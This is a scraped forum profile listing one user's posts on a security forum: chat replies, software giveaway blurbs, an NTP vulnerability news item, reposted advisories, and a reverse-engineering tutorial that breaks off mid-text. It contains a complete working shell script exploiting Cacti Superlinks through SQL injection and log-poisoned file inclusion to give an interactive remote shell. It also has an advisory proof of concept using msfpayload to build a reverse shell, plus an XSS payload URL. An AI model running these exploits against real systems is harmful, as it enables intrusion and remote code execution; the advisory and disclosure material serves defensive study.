Aerosol

Active Members
  • Posts: 3453
  • Joined
  • Last visited
  • Days Won: 22

Everything posted by Aerosol

  1. Won't you show us what you're capable of? Something created by you, I'm curious. E.g. a wallpaper for RST. @badboy17 you combined the two images nicely, well done.
  2. Right-click -> View page source (or more simply press CTRL+U), or even simpler, copy/paste the URL and put view-source: in front of it. Then a page will open: suppose your site is www.filmehd.ro, then the URL will be view-source:www.filmehd.ro. Then you look through the source until you find what you're looking for:
  3. What proof should he give you, man? It's obvious: he wants to take revenge on the administrators/community and have others do the work for him. It's something like: I've already hacked the site, but give me your method so I can see if it's the same as mine...
  4. It's not the same thing, man, can't you see?
  5. To translate from Romanian into English? If that's the case, I can help you too.
  6. @Cronicles
    <center> Partea 1 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=XUHbVFNIQNNQINFVbHUX&width=700&height=360" allowFullScreen></iframe> Partea 2 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=YeAgBXZdDIIDdZXBgAeY&width=700&height=360" allowFullScreen></iframe> Partea 3 <iframe width="700" height="360" scrolling="no" frameborder="0" src="http://videomega.tv/iframe.php?ref=KOUQYcXIHTTHIXcYQUOK&width=700&height=360" allowFullScreen></iframe> </center>
    view-source:http://www.topvideohd.com/2013/05/avatar-2009-online-subtitrat-in-romana.html
  7. DxO Optics Pro 8 Elite is a photo and image processing program that enhances and improves your photos and images using advanced algorithms and techniques — automatically. Want more features? Get DxO Optics Pro 10 Elite with free updates, the latest and greatest version of DxO Optics Pro! Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 41 days 22 hrs 21 mins Free DxO Optics Pro 8 Elite (100% discount)
  8. Ashampoo Internet Accelerator 3 is a program that aims to do things: boost your connection speed by optimizing internet-related settings and clean your internet-related privacy traces. Want more features? Upgrade to Ashampoo WinOptimizer 11, which has all the internet optimization and privacy cleaning features of Ashampoo Internet Accelerator 3 plus more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 2 days 22 hrs 24 mins Free Ashampoo Internet Accelerator 3 (100% discount)
  9. Bitdefender Total Security 2015 is an all-in-one security package for your computer. It provides protection against malware (viruses, trojans, spyware, adware, etc.), has a built-in firewall, helps guard online transactions, protects your privacy, and more. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 1 day 22 hrs 24 mins Free 1-Year License Bitdefender Total Security 2015 (100% discount)
  10. @ICEBREAKER101010 that's what you think, that if you have Linux they can't do anything, blah, blah, blah; they're not that stupid. Man, it's obvious you haven't read/understood this news item; read it once more, twice, ten times until you understand it. Let's not go off-topic, stop with the nonsense...
  11. @Cronicles leave me a link to that site.
  12. Researchers at Google have uncovered several serious vulnerabilities in the Network Time Protocol and experts warn that there are exploits publicly available for some of the bugs. The vulnerabilities are present in all versions of NTP prior to 4.2.8 and include several buffer overflows that are remotely exploitable.

    NTP is a protocol that's used to synchronize the time on servers across networks. It's ubiquitous and that fact has made it a useful tool for attackers in DDoS attacks in recent years. Attackers have taken advantage of a weakness in NTP to amplify DDoS attacks.

    "The reason has to do with the amplification factor," said Arbor Networks solutions architect Gary Sockrider in April. "With NTP reflection attacks, you get 1000 times the amplification; 1000 times the size of the query is reflected back. There's more cause for alarm with NTP attacks because attackers get a better response rate."

    The flaws disclosed today in NTP are more worrisome. They put servers running older versions of the protocol at risk of remote code execution.

    "Google Security Team researchers Neel Mehta and Stephen Roettger have coordinated multiple vulnerabilities with CERT/CC concerning the Network Time Protocol (NTP). As NTP is widely used within operational Industrial Control Systems deployments, NCCIC/ICS-CERT is providing this information for US Critical Infrastructure asset owners and operators for awareness and to identify mitigations for affected devices," an advisory from ICS-CERT says. "These vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available."

    The advisory from NTP.org says that a single packet is enough to exploit any of the buffer overflow vulnerabilities.

    "A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process," the advisory says.

    Source
  13. @Cronicles let's say this is your video: http://videomega.tv/?ref=AJWOLaJQKbbKQJaLOWJA# scroll down to the bottom of the page where it says
  14. #!/bin/sh
    ##############
    # Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
    # Date: 19/12/2014
    # Exploit Author: Wireghoul
    # Software Link: http://docs.cacti.net/plugin:superlinks
    # Identifiers: CVE-2014-4644, EDB-ID-33809
    # Exploit explanation through inline comments
    # Patch provided at the end
    #
    # This is the year where hope fails you -- Slipknot: Pulse of the maggots
    #
    ##############
    echo -e "\e[32m *-*, \e[31m ___________"
    echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\"
    echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\"
    echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'"
    echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'"
    echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m"
    echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
    echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
    echo
    if [ -z $1 ]; then
      echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n";
      exit 2;
    fi
    # This exploit is a second order LFI through SQLI, so first we must write some data to disk
    # Luckily the application logs all sort of stuff, so lets poison the application log
    # The reason for this is manyfold, read on.
    curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null
    # Now lets analyse the vulnerability:
    # superlinks.php:21:if (isset($_GET['id'])) {
    # superlinks.php:22: $pageid=$_GET['id'];
    # superlinks.php:23:}
    # superlinks.php:24:
    # superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
    # superlinks.php:26: id,
    # superlinks.php:27: title,
    # superlinks.php:28: style,
    # superlinks.php:29: contentfile
    # superlinks.php:30: FROM (superlinks_pages, superlinks_auth)
    # superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid
    # superlinks.php:32: AND id=" . $pageid . "
    # This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
    # However the real fun occurs a few lines later
    # superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
    # superlinks.php:58:
    # superlinks.php:59: if (file_exists($my_file)) {
    # superlinks.php:60: @InClude_once($my_file);
    # We can now include a file of our choosing (LFI) based on the data returned from the SQLi
    # There are only a few problems:
    # * We cannot use strings/quotes as magic quotes are usually on
    # * We do not know the local path for the LFI
    # * Usual tricks like /proc/self* have been patched
    # * Database server and web server may be different hosts
    # Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
    # The second one is a little trickier, we can brute force LFI locations... or
    # We can dynamically locate a file path which is stored in the database and present on the webserver
    # $ mysqldump cacti | grep '\.log'
    # INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
    # $ ls -la /var/log/cacti/cacti.log
    # -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
    # $ tail /var/log/cacti/cati.log
    # <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name"
    # WINRAR!
    # We can now include the poisoned log file by fetching the log path from the database
    # and prepending it with the normal directory traversal pattern ../../../ using concat()
    # We traverse 8 deep, that's usually enough
    echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
    while read line; do
      if [ "$line" == "exit" ]; then
        exit
      fi
      comand=`echo -n $line | sed -e's/ /+/g'`
      curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
        sed -n '/SHELL/, $p' | \
        sed -e 's/.*SHELL//' |\
        sed '/LLEHS/, $d'
      echo -n "cactishell> "
    done
    # Proposed patch
    # Vendor has a patch in a SVN repo somewhere:
    # http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
    # Yet has not made the patch available, or responded to requests to do so:
    # http://forums.cacti.net/viewtopic.php?t=53711
    #--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 #+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 #@@ -19,7 +19,7 @@ # # $pageid = 0; # if (isset($_GET['id'])) { #- $pageid=intval($_GET['id']); #+ $pageid=$_GET['id']; # } # # $page = db_fetch_row("SELECT DISTINCT

    Source
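    Review bot: the hunk direction is reversed: the `-` line removes `$pageid=intval($_GET['id']);` and the `+` line puts back `$pageid=$_GET['id'];`, which is the unsanitized assignment the comments at superlinks.php:22 identify as the injection point, and the `+++` timestamp (02:05:09) is older than the `---` one (02:05:37). Applied as written, the patch would strip the intval() cast instead of adding it; swap the two sides (or regenerate the diff with the patched file as the new side) so the fix reads `+ $pageid=intval($_GET['id']);`.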
  15. SEC Consult Vulnerability Lab Security Advisory < 20141219-0 >
    =======================================================================
    title: XSS & Memory Disclosure
    product: NetIQ eDirectory NDS iMonitor
    vulnerable version: 8.8 SP8, 8.8 SP7
    fixed version: 8.8 SP8 HF 4, fix available for versions 8.8 SP7 (8.8.7.4 HF 4, 8.8.7.6 HF 3)
    CVE number: CVE-2014-5212, CVE-2014-5213
    impact: High
    homepage: https://www.netiq.com/
    found: 2014-10-29
    by: W. Ettlinger
        SEC Consult Vulnerability Lab
        https://www.sec-consult.com
    =======================================================================

    Vendor description:
    -----------------------------
    "eDirectory(TM) is a full-service, secure LDAP directory providing incredible scalability and an agile platform to run your organization's identity infrastructure and multi-platform network services."
    URL: https://www.netiq.com/products/edirectory/

    Business recommendation:
    ------------------------
    An attacker without an account on the NetIQ eDirectory NDS iMonitor is able to gain administrative access by luring an authenticated administrator to visit an attacker-controlled web site. Moreover, an authenticated attacker is able to retrieve internal data which potentially contains sensitive data.
    As the NetIQ eDirectory is often used to maintain a centralized user database it is a very attractive target for an attacker. By compromising this system, an attacker may be able to conduct further attacks on other systems.
    SEC Consult recommends to immediately conduct a full security review of this software, especially if used as a centralized user database.

    Vulnerability overview/description:
    -----------------------------------
    1) Memory Disclosure (CVE-2014-5213)
    Using crafted HTTP requests an administrative user can retrieve parts of the virtual memory from the service. This potentially discloses secret data like passwords.

    2) Reflected Cross Site Scripting (XSS, CVE-2014-5212)
    A reflected cross site scripting vulnerability was identified. An attacker could take over the user account of a valid administrator.

    Proof of concept:
    -----------------
    1) Memory Disclosure (CVE-2014-5213)
    When accessing the following URL as an authenticated user, parts of the virtual memory can be retrieved:
    https://<host>:8030/nds/files/opt/novell/eDirectory/lib64/ndsimon/public/images

    2) Reflected Cross Site Scripting (XSS, CVE-2014-5212)
    The following URL demonstrates a reflected XSS flaw:
    https://<host>:8030/nds/search/data?scope=st&rdn=%3C/script%20%3E%3Cscript%20%3Ealert%28%22XSS%22%29%3C/script%20%3E

    Vulnerable / tested versions:
    -----------------------------
    The vulnerabilities have been verified to exist in the NetIQ eDirectory NDS iMonitor version 8.8 SP8, which was the most recent version at the time of discovery.

    Vendor contact timeline:
    ------------------------
    2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys
    2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page
    2014-10-30: Sending encrypted security advisory to Novell
    2014-10-30: Novell acknowledges the receipt of the advisory
    2014-11-18: Novell: the vulnerabilities have been fixed by development; the patches will be released end of November
    2014-12-08: Novell: the release has been pushed to Dec. 8th
    2014-12-09: Novell: the release 8.8.8.4 should be released tomorrow; the hotfix for 8.8.7.6 is still pending
    2014-12-17: Verifying release of advisory; asking whether patches have been released
    2014-12-18: Novell: Patches have been released
    2014-12-19: Coordinated release of security advisory

    Solution:
    ---------
    Update to the release 8.8.8.4 or apply fix for versions 8.8 SP 7.

    Workaround:
    -----------
    No workaround available.

    Advisory URL:
    -------------
    https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Vulnerability Lab
    SEC Consult
    Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
    Headquarter:
    Mooslackengasse 17, 1190 Vienna, Austria
    Phone: +43 1 8903043 0
    Fax: +43 1 8903043 15
    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult
    Interested to work with the experts of SEC Consult? Write to career@sec-consult.com
    EOF W. Ettlinger / @2014

    Source
  16. Document Title:
    ===============
    iBackup v10.0.0.45 - Privilege Escalation Vulnerability

    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1382

    Release Date:
    =============
    2014-12-18

    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1382

    Common Vulnerability Scoring System:
    ====================================
    6.2

    Product & Service Introduction:
    ===============================
    With IBackup, you can backup/restore interactively or schedule regular online backups for Windows desktops, laptops and servers. It has a simple, user-friendly interface coupled with powerful scheduling and logging features. IBackup automatically selects critical data (Desktop, Music, Pictures, Videos, Documents, Windows Mail, Favourites) for backup. Advanced features include Open file Backup, System State backup, MS SQL Server, MS Exchange Server, Hyper-V, MS SharePoint Server and Oracle Server backups.
    (Copy of the Vendor Homepage: https://www.ibackup.com/ibwin/downloads/IBackupsetup.exe )

    Abstract Advisory Information:
    ==============================
    An independent vulnerability laboratory researcher discovered a local privilege escalation vulnerability in the official Pro Softnet Corporation iBackup v10.0.0.45 software.

    Vulnerability Disclosure Timeline:
    ==================================
    2014-12-18: Public Disclosure (Vulnerability Laboratory)

    Discovery Status:
    =================
    Published

    Affected Product(s):
    ====================
    Pro Softnet Corporation
    Product: iBackup - Server Software 10.0.0.45

    Exploitation Technique:
    =======================
    Local

    Severity Level:
    ===============
    High

    Technical Details & Description:
    ================================
    A local privilege escalation vulnerability has been discovered in the official iBackup v10.0.0.45 software. The vulnerability allows local attackers to gain higher access privileges by execution of arbitrary codes.

    The `ibservice` service for Windows could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

    The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the vulnerability requires a local privileged system user account without user interaction. Successful exploitation of the arbitrary code execution vulnerability results in software- or system compromise.

    Proof of Concept (PoC):
    =======================
    The vulnerability can be exploited by local attackers with low privileged or restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

    --- PoC Session Logs ---
    C:\Users\s-dz\Desktop>sc qc ibservice
    [SC] QueryServiceConfig réussite(s)

    SERVICE_NAME: ibservice
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : IBackup Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem*
    -
    C:\Users\s-dz\Desktop>sc qc ibservice
    [SC] QueryServiceConfig réussite(s)

    SERVICE_NAME: ibservice
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : IBackup Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    -
    C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\IBackupWindows\"
    C:\Program Files\IBackupWindows
      Medium Mandatory Level (Default) [No-Write-Up]
      RW Tout le monde
            FILE_ADD_FILE
            FILE_ADD_SUBDIRECTORY
            FILE_LIST_DIRECTORY
            FILE_READ_ATTRIBUTES
            FILE_READ_EA
            FILE_TRAVERSE
            FILE_WRITE_ATTRIBUTES
            FILE_WRITE_EA
            DELETE
            SYNCHRONIZE
            READ_CONTROL
      RW NT SERVICE\TrustedInstaller
            FILE_ALL_ACCESS
      RW AUTORITE NT\Système
            FILE_ALL_ACCESS
      RW BUILTIN\Administrateurs
            FILE_ALL_ACCESS
      R  BUILTIN\Utilisateurs
            FILE_LIST_DIRECTORY
            FILE_READ_ATTRIBUTES
            FILE_READ_EA
            FILE_TRAVERSE
            SYNCHRONIZE
            READ_CONTROL

    ############## PROOF
    C:\Users\s-dz\Desktop>net user s-dz
    Nom d'utilisateur                            s-dz
    Nom complet                                  s-dz
    Commentaire
    Commentaires utilisateur
    Code du pays                                 000 (Valeur par défaut du système)
    Compte : actif                               Oui
    Le compte expire                             Jamais

    Mot de passe : dernier changmt.              18/12/2014 01:12:55
    Le mot de passe expire                       Jamais
    Le mot de passe modifiable                   18/12/2014 01:12:55
    Mot de passe exigé                           Oui
    L'utilisateur peut changer de mot de passe   Oui

    Stations autorisées                          Tout
    Script d'ouverture de session
    Profil d'utilisateur
    Répertoire de base
    Dernier accès                                18/12/2014 06:04:49

    Heures d'accès autorisé                      Tout

    Appartient aux groupes locaux                *Utilisateurs
    Appartient aux groupes globaux               *None
    La commande s'est terminée correctement.

    C:\Users\s-dz\Desktop>

    root@samir:~# msfpayload windows/shell_reverse_tcp lhost='192.168.1.5' lport='4433' X > C:\Users\s-dz\Desktop\evil-ZDserv.exe

    C:\Users\s-dz\Desktop>copy evil-ZDserv.exe "C:\Program Files\IBackupWindows\ib_service.exe"
    Remplacer C:\Program Files\IBackupWindows\ib_service.exe (Oui/Non/Tous) : o
            1 fichier(s) copié(s).

    We will open cmd as administrator to start the service ibservice
    C:\Users\s-dz\Desktop>sc start ibservice

    now nc ... (user)
    C:\Users\s-dz\Desktop>nc.exe -lvp 4433
    listening on [any] 4433 ...
    connect to [192.168.1.5] from s-dz [192.168.1.5] 16040
    Microsoft Windows [version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.

    C:\Windows\system32>whoami
    whoami
    autorite nt\système

    C:\Windows\system32>

    Security Risk:
    ==============
    The security risk of the local privilege escalation software vulnerability in the root path is estimated as high. (CVSS 6.2)

    Credits & Authors:
    ==================
    Hadji Samir S-dz@hotmail.fr

    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

    Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
    Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
    Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
    Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
    Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

    --
    VULNERABILITY LABORATORY - RESEARCH TEAM
    SERVICE: www.vulnerability-lab.com
    CONTACT: research@vulnerability-lab.com
    PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

    Source
  17. @AndreiMihai you won't manage to do anything with those 1,200 euros; if only everything were that easy...
  18. Introduction Hopefully you are familiar with Assembly language and have some little knowledge on how to use reverse engineering tools such as Debuggers, Disassemblers, PE Analyzers, etc. This article will only concentrate on the RSA cryptosystem and how to reverse it to get a valid key for your name. We will be targeting a challenge made especially for this tutorial to demonstrate how to do that. Tools Needed Assuming you’ve already got the required knowledge on how to use reverse engineering tools, these are the essential tools for this article (the download links are in the bottom): The target file (CryptoChallenge1.exe) IDA (Interactive Disassembler): Disassembler for computer software which generates assembly language source code from machine-executable code. OllyDBG: An x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. PEiD: PE analyzes tool, detects most common packers, cryptors and compilers for PE files, it also detects hashes and cryptographic algorithms used in the PE file. RE-SIGS: IDA signature file to detect libraries used by programs. GODUP: OllyDBG plugin to load IDA signature files. RSA-Tool: Useful for generation of key pairs, encryption/decryption and also integer factorization (and that’s what we will use it for). TiBiNuCa: A Tiny Big Number Calculator (requires dotNetFx4). What is RSA? RSA is a public-key cryptosystem. It was developed in 1977 by Ronald Rivest, Adi Shamir and Leonard Adleman. The fact that it’s a public-key cryptosystem means that it uses a public and a private key for the encryption/decryption of data. Its strength lies in the integer factorization problem (the larger the number, the harder and longer it will take to factorize) commonly known as the RSA Problem. RSA uses the following parameters: P: 1st large prime number. Q: 2nd large prime number. E: Public Exponent. N: Public Modulus. D: Private Exponent. Key generation Choose a key length (measured in bits). 
Generate the two random prime numbers P and Q. Choose a public exponent E such that GCD(E, (P-1)*(Q-1))==1), the most commonly used number is 65537. Compute the Public Modulus N = P * Q. Determine the Private Exponent (D) using the Modular multiplicative inverse formula D=E^(-1) mod ((P-1)*(Q-1)). The symbol (^) is used as the Exponent and not the XOR operator. (Mod) means modulo/modulus in computing and is an operation that finds the remainder of the division of one number by another. D must be kept private and must never be published! Alongside P and Q. Encryption To encrypt a message (M) (where M < N), we would use the following formula: C = M ^ E mod N Decryption To decrypt a given cipher © we would use the following formula: M = C ^ D mod N Example (in base 16) By following the steps above: Let’s choose a Keysize: 32 bits (which is totally unsecure). P = 2F6DB Q = 19CD3 E = 10001 (base 16 of 65537). N = P*Q = 4C7B9EA81 D = E^(-1) mod ((P-1)*(Q-1)) = 10001^(-1) mod ( (2F6DB-1) * (19CD3-1) ) = 10001^(-1) mod (2F6DA * 19CD2) = 10001^(-1) mod (4C7B556D4) = 72C6E47D That was calculated using TiBiNuCa: Now that we have our key pairs, we can encrypt our message: M = InfoSec which equals 49 6E 66 6F 53 65 63 in base 16. And since M > N we can split M into blocks smaller than N (M<N) as follows: 496E666F ^ 10001 mod 4C7B9EA81 = 143B30CF8 00536563 ^ 10001 mod 4C7B9EA81 = 380323BEB C = 143B30CF8380323BEB Now in order to decrypt the above cipher we should have the Private Exp (D) but what happens if we don’t! That’s where the factorization comes. That’s the job of RSA-Tool. (We’ll see how to do Factor N later). 143B30CF8 ^ 72C6E47D mod 4C7B9EA81 = 496E666F 380323BEB ^ 72C6E47D mod 4C7B9EA81 = 536563 M = 496E666F536563 = InfoSec. Target analyses Let’s try to apply all of the above in our challenge. I always check the target before everything, so that’s what we will do. 
Open up the target “CryptoChallenge1.exe” and type any Name/Serial. I’ve typed my name, and for the serial I had to make many tries before it gave me that message “SERiAL STATUS: UNREGiSTERED” (the target checks for the serial’s length).

Now we analyze our target to see if it’s packed/protected. As you can see, the analysis shows it was compiled using MASM32 / TASM32. But the crypto analysis using KANAL shows the target has some crypto inside (MD5 and BigLib: an assembly bignum library).

Alright, now that we know what we’re dealing with, we will use IDA to extract these cryptos’ signatures from our target. To do that you should have the sig file “RE-SIGS” (download link at the bottom).

PS: Before opening IDA, you should copy the signature file “RE-SIGS” into the folder IDA\sig.

Open the target in IDA and go to menu View > Open subviews > Signatures, or just press Shift+F5. A list of applied library modules shows up. To apply a new signature, you can either press “Ins” or right-click > Apply new signatures. A new window will show up. Choose RESIGS and click OK. You will be able to see the changes in the functions window. 33 functions were applied, which means it has found the crypto algorithms and libraries and has given them their real names.

Now we will export this result so that we can use it in our debugger. To do that, go to File > Produce file > Create MAP file as shown below. Save your file in a place you can remember, and leave the MAP file options as they are, as shown below (just click OK).

Now that we have our map file, let’s debug.

PS: Before opening OllyDBG you should put the plugin “GODUP Plugin” in the plugins section of the debugger you’re using, because that’s what we will be using to import our map file.

Fire up the target file in OllyDbg and go to: Plugins > GODUP Plugin > Map Loader > Load labels, and choose the map file you’ve saved before.

The code is easy and simple: there are the initial APIs that load the PE file, and after that there is GetDlgItemTextA (gets a text from an editbox/textbox and puts it in a buffer). Let’s put a breakpoint on that API and see what it really gets (simply click on address 0040107A and press F2).

The tracing shows that the API is used to get the typed name. The target then checks if a name was typed, or it will show a text saying “NAME STATUS : NO NAME”; after that it checks if the length of the name is longer than 15 (CMP EAX,0F) and shorter than 3 (CMP EAX,3). If the name is longer than 3 and shorter than 15, it jumps to another GetDlgItemTextA API that gets the typed serial and does the same as for the name checks, except that the length must not be longer than 64 (CMP EAX,40) and not shorter than 63 (CMP EAX,3F). If everything is good, it will jump to address 0x40115A, which calls another address: CALL 0x401189.

What might that address (00401189) contain? Let’s go check it out, shall we! The address sends us to the challenge’s RSA routine shown below:

The tracing of that function shows that lstrlenA at 0x40118E is used to get the length of our name, and then that length is moved to EBX. The three following calls (MD5Init, MD5Update and MD5Final) generate the MD5 hash for the name. That hash is then converted to hexadecimal using HexEncode at 0x4011B2 and is put in address 0x407847.

The calls (0x4011B9, 0x4011C5, 0x4011D1 and 0x4011DD) reference BigCreate. This API is used by BigLib to create a bignumber and initialize it with the value InitValue. The three next calls (0x4011F4, 0x401206 and 0x401218) reference BigIn, which is used to fill the given bignumber with the null-terminated string in the given base (16 in this case). Here is an example of that function:

    PUSH output  // our bignumber buffer
    PUSH 16      // base
    PUSH input   // (typed serial, public modulus n, public exponent e)
    CALL _BigIn

Now we have:

0x4083F8 = Serial in bignum.
0x408400 = Public Modulus (N) in bignum.
0x408404 = Public Exponent (E) in bignum.
N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
E = 10001

Next, the call at 0x401235 is a reference to the function BigPowMod, which is the encryption formula, used as follows:

0x4083FC = 0x4083F8 ^ 0x408404 mod 0x408400, or C = Serial ^ E mod N

After that, there is a call at 0x401247 to the BigOut function. It is the opposite of BigIn: it converts from bignumber to a base-16 string. The result is put in 0x407C47.

Next comes the algorithm from 0x40124C to 0x40126E, which has a loop that compares each character from 0x407847 (MD5 hash of our name) with each character from 0x407C47 (our serial). It is easy to make it accept any serial just by patching the JNZ at 0x401266 into NOPs. But that’s not ideal.

The JNZ at 0x401266 inside the loop checks if two characters are equal; if not, it jumps to address 0x401290, which has a SetDlgItemTextA that outputs “SERiAL STATUS: UNREGiSTERED”; otherwise it doesn’t jump and shows “SERiAL STATUS: REGiSTERED”. After each SetDlgItemTextA call, there are two calls (CALL 0x4012B0) and (CALL 0x4012DE). 0x4012B0 is a function that has three calls to RtlZeroMemory, which is used to clear the data. 0x4012AA is a function that has four calls which reference BigDestroy. It destroys the bignums that were created by BigCreate.

This is what we know so far:
- The Name must be longer than 3 and shorter than 15 characters.
- The Serial must contain either 63 or 64 characters.
- N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
- E = 10001
- The target compares the MD5 hash of the Name with the result of the BigPowMod (C = Serial ^ E mod N).
- The Public Exponent N is 256 bits.
- The serial should be in base 16.

Alright, now we need to reverse C = Serial ^ E mod N into M = C ^ D mod N (remember RSA’s encryption/decryption formulas!) so that we can get a valid serial. For that we need to factor N to get the Private Exponent D.

Load up RSA-Tool and copy the N into the Modulus N textbox (to get the key size click Exact size), then click Factor N and wait until it finds P and Q. This will take a while depending on the computer you’re using (it took 1h on my computer). Once the tool finishes factoring, you will see the P and Q textboxes filled:

P = 960A589F7B9AA6E2FBF05A5F5E507465
